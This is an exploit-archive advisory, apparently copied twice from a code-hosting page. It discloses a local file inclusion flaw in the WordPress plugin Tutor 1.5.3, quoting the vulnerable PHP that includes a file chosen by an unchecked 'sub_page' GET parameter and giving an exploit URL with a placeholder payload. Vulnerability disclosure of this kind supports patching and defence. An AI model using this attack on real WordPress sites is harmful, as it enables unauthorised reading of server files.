39 lines
No EOL
1.5 KiB
Text
39 lines
No EOL
1.5 KiB
Text
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
|
|
# Author: mehran feizi
|
|
# Category: webapps
|
|
# Date: 2020-02-12
|
|
# vendor home page: https://wordpress.org/plugins/tutor/
|
|
|
|
===================================================================
|
|
Vulnerable page:
|
|
/instructors.php
|
|
===================================================================
|
|
Vulnerable Source:
|
|
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
|
|
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
|
|
7: include include $include_file;
|
|
requires:
|
|
4: if(!empty($sub_page))
|
|
6: if(file_exists($include_file))
|
|
===================================================================
|
|
Exploit:
|
|
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
|
|
=================================================================================
|
|
contact me:
|
|
telegram: @MF0584
|
|
gmail: mehranfeizi13841384@gmail.com
|
|
===================================================================
|
|
Vulnerable page:
|
|
/instructors.php
|
|
===================================================================
|
|
Vulnerable Source:
|
|
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
|
|
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
|
|
7: include include $include_file;
|
|
requires:
|
|
4: if(!empty($sub_page))
|
|
6: if(file_exists($include_file))
|
|
===================================================================
|
|
Exploit:
|
|
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
|
|
================================================================================= |